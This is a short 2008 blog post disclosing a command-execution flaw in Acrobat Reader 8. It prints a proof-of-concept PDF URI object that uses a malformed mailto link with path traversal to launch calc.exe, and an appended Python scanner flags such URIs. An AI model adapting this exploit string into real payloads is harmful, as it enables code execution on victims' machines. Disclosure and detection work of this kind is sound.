Thursday, April 24, 2008

Interesting "feature" of AcroRead

Acroread8 is vulnerable to command execution: in the URI tag it is possible to give a local path to the file you want executed.
get the exploit
This exploit executes the Windows calculator, but it can be modified easily:

00000f30 20 6f 62 6a 0d 3c 3c 2f 55 52 49 28 6d 61 69 6c | obj.<</URI(mail|
00000f40 74 6f 3a 74 65 73 74 25 2e 2e 2f 2e 2e 2f 2e 2e |to:test%../../..|
00000f50 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f |/../../../../../|
00000f60 77 69 6e 64 6f 77 73 2f 73 79 73 74 65 6d 33 32 |windows/system32|
00000f70 2f 63 61 6c 63 2e 65 78 65 22 2e 63 6d 64 29 2f |/calc.exe".cmd)/|
<</URI(mailto:test%../../../../../../../../windows/system32/calc.exe".cmd)/S/URI>>

Conclusion: don't trust any file given to you by unknown people :)
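
A way to check a PDF for the pattern in the dump above before opening it, as an added example that is not part of the original post: it pulls every `/URI(...)` string out of the raw bytes and flags the traits visible in that object. The function names and the heuristics are assumptions, the sample bytes are constructed from the object shown above, and only uncompressed objects are seen.

```python
import re

# Literal string following /URI; handles backslash escapes, not nested parens.
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\()])*)\)")
BAD_PERCENT = re.compile(rb"%(?![0-9A-Fa-f]{2})")   # '%' not followed by two hex digits
TRAVERSAL = re.compile(rb"\.\.[/\\]")               # ../ or ..\
EXEC_EXT = re.compile(rb"\.(?:exe|cmd|bat|pif|scr)\b", re.I)
SAFE_SCHEMES = (b"http:", b"https:", b"mailto:", b"ftp:")  # assumed allow-list

def check_uri(uri: bytes) -> list[str]:
    """Return the reasons a URI action target looks suspicious (empty = clean)."""
    reasons = []
    if not uri.lower().startswith(SAFE_SCHEMES):
        reasons.append("unexpected scheme")
    if BAD_PERCENT.search(uri):
        reasons.append("malformed percent-escape")
    if TRAVERSAL.search(uri):
        reasons.append("path traversal sequence")
    if EXEC_EXT.search(uri):
        reasons.append("executable file extension")
    if b'"' in uri:
        reasons.append("embedded double quote")
    return reasons

def scan_pdf(data: bytes) -> list[tuple[bytes, list[str]]]:
    """Find /URI(...) strings in raw PDF bytes and report the flagged ones."""
    findings = []
    for m in URI_RE.finditer(data):
        reasons = check_uri(m.group(1))
        if reasons:
            findings.append((m.group(1), reasons))
    return findings

# Constructed sample: the object from the dump plus a benign link.
SAMPLE = (
    b'5 0 obj\r<</URI(mailto:test%../../../../../../../../windows/system32/calc.exe".cmd)/S/URI>>\rendobj\r'
    b"6 0 obj\r<</URI(http://example.com/a%20b)/S/URI>>\rendobj\r"
)

if __name__ == "__main__":
    for uri, reasons in scan_pdf(SAMPLE):
        print(uri.decode("latin-1"), "->", ", ".join(reasons))
```

To scan a real file, pass `open(path, "rb").read()` to `scan_pdf`; a URI inside a compressed object stream will not be found without decompressing it first.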

2 comments:

Anonymous said...

That is old.

Jesús said...

I'm still vulnerable :) I have to upgrade, and people should too.